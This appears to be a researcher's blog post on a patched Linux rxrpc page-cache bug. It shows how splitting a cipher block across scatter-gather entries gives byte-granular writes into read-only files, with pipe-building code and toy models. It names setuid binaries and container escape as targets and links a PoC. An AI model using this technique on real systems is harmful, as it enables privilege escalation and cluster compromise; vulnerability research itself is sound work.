Part I ended with a sentence that kept bugging me:
"Page-cache bugs were (are?) one of the best primitives... reliable, silent, resilient, and most of the time pretty hidden in the VM code."
The parenthetical resolved itself. The "are" quietly became a "were." Almost all of them are gone now. The patches landed. The embargo, the one with public patches (are you serious?), is over. New PoCs are floating around.
I read the new writeups, read the dirtyfrag analysis, and the 8-byte constraint stopped me cold. I was sure the constraint wasn't there: the write lands where the SGL says it lands, and the SGL is yours to shape. I went back to the source. Apart from some refactoring around io_thread.c, nothing had moved in the last few years. The bug was the same bug. The constraint wasn't in it. It never was.
This is just a reflection on something that happens more often than we'd like to admit (and it has happened to me too, so many times... sigh). You look at a codebase, you trace one path through it, and that path becomes the truth. A constraint that's really just an artifact of how someone built the pipe starts feeling like a law of physics. And somewhere in the source there's a function with a boring name that handles exactly the case you needed, and you never open it, because why would you? The constraint already made sense.
The constraint everyone accepted
The public writeup describes the primitive clearly. The exploit constructs a malicious packet by splicing 8 bytes of file data into a pipe, right after the 28-byte rxrpc wire header. When the packet hits the kernel, skb_to_sgvec() skips the header and produces a scatter-gather list with one entry: the file's page-cache page, 8 bytes long. skcipher_walk() sees one contiguous region equal to the fcrypt block size, takes the fast path, maps the page directly, decrypts in place, unmaps. Eight bytes of decrypted output overwrite eight bytes of someone else's file.
The writeup calls this an "8-byte STORE" and treats it as a fixed property of the primitive.
From the author's own words:
"To plant a desired 8 bytes, K such that this value drops out has to be brute forced in user-space, and the cost grows exponentially with the number of constrained plaintext bytes (when all 8 bytes are constrained, the key space reaches ~2⁵⁶, which is practically infeasible). For that reason, the ESP-style approach of writing a static 192-byte ELF as a whole into the /usr/bin/su page cache is impractical, and instead a target with very few bytes that need to be decided must be chosen."
It basically hits a wall: you can't control all 8 bytes without a 2^56 key search, so it pivots to a clever workaround with PAM configuration files, where you only need to control a few bytes. The PAM trick was genuinely clever - but the constraint it was designed to work around may not actually be there: splitting the scatter-gather list so that only one file byte lands inside the cipher block pushes skcipher_walk() into its slow path, where it gathers across the boundary, decrypts, and scatters back just that single byte to the page cache, turning what looked like a 2^56 search into a few hundred iterations.
The cement sets fast
Here's what happened, and I say this with sympathy because I've done the exact same thing more times than I'd like to admit.
The exploit constructs the pipe like this:
pipe buffer 0: wire header (28 bytes)   <-- vmsplice from userspace
pipe buffer 1: file data (8 bytes)      <-- splice from target
skb_to_sgvec skips 28 bytes of header, lands on the 8-byte file fragment. Single SGL entry. Single page. Fast path. Eight bytes decrypted in place, eight bytes corrupted.
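The vmsplice/splice plumbing itself needs nothing from rxrpc and can be exercised against a scratch file. A minimal sketch (helper name is mine, not from the exploit) that builds the same two-buffer pipe:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

/* Build the two-buffer pipe: vmsplice the header from userspace
 * memory, then splice fraglen bytes of file data (page-cache backed)
 * in behind it. Returns total bytes queued, or -1 on error. */
ssize_t build_two_buffer_pipe(int pipe_wr, const void *hdr, size_t hdrlen,
                              int filefd, size_t fraglen)
{
    struct iovec iov = { .iov_base = (void *)hdr, .iov_len = hdrlen };
    off_t off = 0;

    /* pipe buffer 0: the wire header, from userspace memory */
    if (vmsplice(pipe_wr, &iov, 1, 0) != (ssize_t)hdrlen)
        return -1;
    /* pipe buffer 1: the file fragment, no copy through userspace */
    if (splice(filefd, &off, pipe_wr, NULL, fraglen, 0) != (ssize_t)fraglen)
        return -1;
    return (ssize_t)(hdrlen + fraglen);
}
```

Each call creates its own pipe buffer, which is the whole point: the buffer layout is decided entirely in userland, one syscall per buffer.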
This framing - "the cipher block IS the file data" - became the load-bearing assumption. Every PoC reproduces it. It looks structural. It feels like a property of the cipher, or the crypto API, or skb_to_sgvec(). It isn't. It's a property of how the exploit constructs the pipe. That's it. That's the whole thing.
skb_to_sgvec() doesn't care about cipher blocks. It doesn't know the cipher exists. Here's the fragment loop:
for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) {
	int end;

	end = start + skb_frag_size(&skb_shinfo(skb)->frags[i]);
	if ((copy = end - offset) > 0) {
		skb_frag_t *frag = &skb_shinfo(skb)->frags[i];

		if (copy > len)
			copy = len;
		sg_set_page(&sg[elt], skb_frag_page(frag), copy,
			    skb_frag_off(frag) + offset - start);
		elt++;
		if (!(len -= copy))
			return elt;
		offset += copy;
	}
	start = end;
}
One sg_set_page() per fragment, with whatever length that fragment has. One frag, one SGL entry. Two frags, two SGL entries. The crypto layer processes the SGL as a byte stream. If a cipher block spans two entries, skcipher_walk() handles it transparently.
The only question is: can the attacker control the fragment boundary within the 8-byte cipher block?
Each splice() into the pipe creates a separate pipe buffer. Each pipe buffer becomes a separate skb fragment when the pipe is spliced into the UDP socket. The attacker controls the boundary because the attacker controls the pipe operations.
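The fragment loop above is easy to model in userland. A toy version (names are mine; in the real skb the 28-byte header lives in the linear area rather than a fragment, which doesn't change the shape of the output) shows that the SGL is purely a function of the fragment layout:

```c
#include <assert.h>
#include <stddef.h>

struct sgent { size_t off, len; };   /* one scatter-gather entry (toy) */

/* Toy model of skb_to_sgvec()'s fragment loop: fragments laid end to
 * end, walk [offset, offset+len) and emit one entry per fragment
 * touched, with whatever length that fragment contributes. */
size_t sgvec_from_frags(const size_t *fraglen, size_t nfrags,
                        size_t offset, size_t len, struct sgent *sg)
{
    size_t start = 0, elt = 0;

    for (size_t i = 0; i < nfrags && len; i++) {
        size_t end = start + fraglen[i];
        if (end > offset) {
            size_t copy = end - offset;
            if (copy > len)
                copy = len;
            sg[elt].off = offset - start;   /* sg_set_page() analogue */
            sg[elt].len = copy;
            elt++;
            len -= copy;
            offset += copy;
        }
        start = end;
    }
    return elt;
}
```

Feed it the original layout (28-byte header, one 8-byte frag) and you get one entry of 8. Feed it a 7-byte frag followed by a 1-byte frag and you get two entries, with the boundary exactly where the pipe operations put it.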
The straddle
Instead of splicing 8 bytes of file data, split the payload across two pipe operations:
pipe buffer 0: wire header (28 bytes)   <-- vmsplice from userspace
pipe buffer 1: anon pad (7 bytes)       <-- vmsplice from userspace
pipe buffer 2: file data (1 byte)       <-- splice from target file
Seven throwaway bytes. One file byte. Same total: 8 bytes, one cipher block. But now skb_to_sgvec(), that same loop above, produces:
SG-0: anon page,       len=7   (the pad)
SG-1: file page-cache, len=1   (the target byte)
The cipher block spans two SGL entries. This is the pivot.
The slow path
When the cipher block spans two SGL entries, skcipher_walk_next() sees that the first entry is shorter than the block size and drops into the bounce-buffer path. The interesting part is what happens on each side of the decrypt.
On the way in, memcpy_from_scatterwalk() pulls bytes across the boundary:
inline void memcpy_from_scatterwalk(void *buf, struct scatter_walk *walk,
				    unsigned int nbytes)
{
	do {
		unsigned int to_copy;

		to_copy = scatterwalk_next(walk, nbytes);
		memcpy(buf, walk->addr, to_copy);
		scatterwalk_done_src(walk, to_copy);
		buf += to_copy;
		nbytes -= to_copy;
	} while (nbytes);
}
scatterwalk_next() returns 7: the remaining bytes in SG-0, our throwaway pad. Copies them. Advances to SG-1. Returns 1: the single file byte. Copies it. The bounce buffer now holds [0xCC * 7 || file_byte]. The cipher decrypts it in place. On the way out, skcipher_walk_done() calls the mirror function:
inline void memcpy_to_scatterwalk(struct scatter_walk *walk, const void *buf,
				  unsigned int nbytes)
{
	do {
		unsigned int to_copy;

		to_copy = scatterwalk_next(walk, nbytes);
		memcpy(walk->addr, buf, to_copy);
		scatterwalk_done_dst(walk, to_copy);
		buf += to_copy;
		nbytes -= to_copy;
	} while (nbytes);
}
Same loop, reverse direction. Seven bytes of decrypted garbage go back to the anon page. Then scatterwalk_next() crosses into SG-1, returns 1, and that memcpy(walk->addr, buf, 1) writes one byte of attacker-chosen plaintext directly into the file's page-cache page.
That's the whole write. One memcpy(), one byte, into a page the attacker could only read.
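The whole slow-path round trip fits in a userland sketch: plain buffers standing in for pages, XOR standing in for fcrypt, and helper names that are mine, not the kernel's. Only the walk logic is faithful.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct sgbuf { unsigned char *addr; size_t len; };   /* one SG entry (toy) */

/* Toy scatter walk: gather into (to_sg=0) or scatter out of (to_sg=1)
 * a contiguous buffer, crossing SG entry boundaries as needed. Models
 * memcpy_from_scatterwalk()/memcpy_to_scatterwalk(). */
static void toy_walk(struct sgbuf *sg, unsigned char *buf, size_t nbytes,
                     int to_sg)
{
    size_t i = 0, off = 0;

    while (nbytes) {
        size_t avail = sg[i].len - off;                  /* scatterwalk_next() */
        size_t to_copy = avail < nbytes ? avail : nbytes;

        if (to_sg)
            memcpy(sg[i].addr + off, buf, to_copy);      /* scatter back */
        else
            memcpy(buf, sg[i].addr + off, to_copy);      /* gather in */
        buf += to_copy;
        nbytes -= to_copy;
        off += to_copy;
        if (off == sg[i].len) { i++; off = 0; }
    }
}

/* One slow-path block: gather 7 pad bytes + 1 file byte into a bounce
 * buffer, "decrypt" in place (XOR as a stand-in cipher), scatter back.
 * Only byte 7 lands in the file page. */
void slow_path_block(struct sgbuf sg[2], const unsigned char key[8])
{
    unsigned char bounce[8];

    toy_walk(sg, bounce, 8, 0);          /* memcpy_from_scatterwalk */
    for (int i = 0; i < 8; i++)
        bounce[i] ^= key[i];             /* decrypt in place (toy) */
    toy_walk(sg, bounce, 8, 1);          /* memcpy_to_scatterwalk */
}
```

Run it with a 7-byte pad entry and a 1-byte file entry and the asymmetry falls out: the pad soaks up seven bytes of output, the file page takes exactly one.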
The brute-force that isn't
It's not a brute-force anymore. That's the point.
With one constrained byte instead of eight, finding the right session key is a lookup, not a search. You iterate a few hundred keys, check if the last byte of the decrypted block matches your target, and move on. The whole thing completes in about 50 microseconds. Writing 8 arbitrary bytes into someone else's file takes 3–12 milliseconds end-to-end, including the rxrpc handshake, pipe construction, verification, and retry.
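The search itself is small enough to sketch. The cipher below is a toy stand-in, not fcrypt: the only property that matters is that varying the key permutes the output byte, so one constrained byte bounds the search at 2^8 candidates.

```c
#include <assert.h>
#include <stdint.h>

/* Toy stand-in for fcrypt's effect on the block's last byte. NOT the
 * real cipher; only the search arithmetic is the point. */
static uint8_t toy_decrypt_last(uint32_t key, uint8_t ct_last)
{
    return (uint8_t)(ct_last ^ (uint8_t)(key * 167u + 13u));
}

/* One constrained byte: iterate keys until the decrypted last byte
 * equals the target. Bounded by 256 candidates, not 2^56. */
long find_key(uint8_t ct_last, uint8_t target)
{
    for (uint32_t k = 0; k < 256; k++)
        if (toy_decrypt_last(k, ct_last) == target)
            return (long)k;
    return -1;   /* unreachable here: k*167+13 (mod 256) is a bijection */
}
```

With eight constrained bytes the same loop would need ~2^56 iterations; with one, it terminates within 256 for any target, which is where the microsecond figure comes from.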
That's not a primitive with limitations you have to work around. That's just a write.
One key, many bytes
There's a practical problem with the approach as described: each byte write uses a different session key, which means a fresh add_key() call, a new rxrpc connection, a full handshake. Getting rid of a key is not as straightforward as it might seem. When embedding this into a container sibling attack you end up consuming too many keys. On many systems keys are rate-limited: the kernel enforces per-user key quotas (/proc/sys/kernel/keys/maxkeys), and even where the quota is generous, each call is a trip through the keyring subsystem with its own locking overhead.
The fix is obvious once you stop thinking of the key as the variable.
We chose the pad. We chose the key. We know the file byte. The ciphertext block the kernel will decrypt is [pad[0..6] || orig_byte], and the output is fcrypt_decrypt(K, ciphertext). We've been varying K to make output byte 7 hit our target. But K isn't the only free variable. The pad is too, and we control it entirely from userland via vmsplice: no extra keys, no connection teardown.
Fix the key once. For each byte you want to write, brute-force the pad instead.
Varying a single pad byte gives 256 possibilities. Same expected cost as the key search, ~256 iterations, but the key schedule is already done. And since the key doesn't change, the rxrpc connection stays up. One add_key(), one handshake, then write as many bytes as you want by varying the pad in each vmsplice. The keyring quota becomes irrelevant.
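Same arithmetic from the other side. Again a toy block mix rather than fcrypt, but with the property the trick relies on: a real block cipher diffuses every input byte into every output byte, so wiggling one pad byte moves the byte that lands in the file page.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Toy 8-byte block "decrypt" reduced to its last output byte; every
 * input byte is mixed in, like a real block cipher. NOT fcrypt. */
static uint8_t toy_last_byte(const uint8_t in[8], uint32_t key)
{
    uint32_t acc = key * 0x9E3779B1u;

    for (int i = 0; i < 8; i++)
        acc = acc * 31 + in[i];
    return (uint8_t)acc;
}

/* Fixed key; vary pad[0] until the decrypted last byte - the one that
 * lands in the file page - equals target. At most 256 iterations, no
 * new add_key(), no new connection. */
int find_pad(uint32_t key, uint8_t file_byte, uint8_t target, uint8_t pad[7])
{
    uint8_t block[8];

    memset(pad, 0xCC, 7);
    memcpy(block, pad, 7);
    block[7] = file_byte;
    for (int v = 0; v < 256; v++) {
        block[0] = (uint8_t)v;
        if (toy_last_byte(block, key) == target) {
            pad[0] = (uint8_t)v;
            return v;
        }
    }
    return -1;
}
```

The key schedule runs once; after that, each target byte costs one loop over a single vmsplice'd pad byte.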
The whole exploit reduces to one key, one connection, N packets. On a system where add_key() is watched, logged, or throttled, the difference is huge.
Where this actually lands
Now the primitive may work inside containers: not just for local privilege escalation between users on the same host, but for sibling injection across pods and, in the right configurations, escape to the host. It's not as straightforward as the AF_ALG primitive, but it's not that contained either. That's a different conversation entirely. Granted, the rxrpc module isn't loaded everywhere: Ubuntu and a handful of others ship it, most don't. But where it is, the impact isn't "unprivileged user becomes root." It's "compromised pod may become your cluster." Bit of a difference.
The PoC for the rxrpc byte-granular write to setuid binaries is at https://github.com/sgkdev/rxrpc_privesc - integration into page_inject will follow.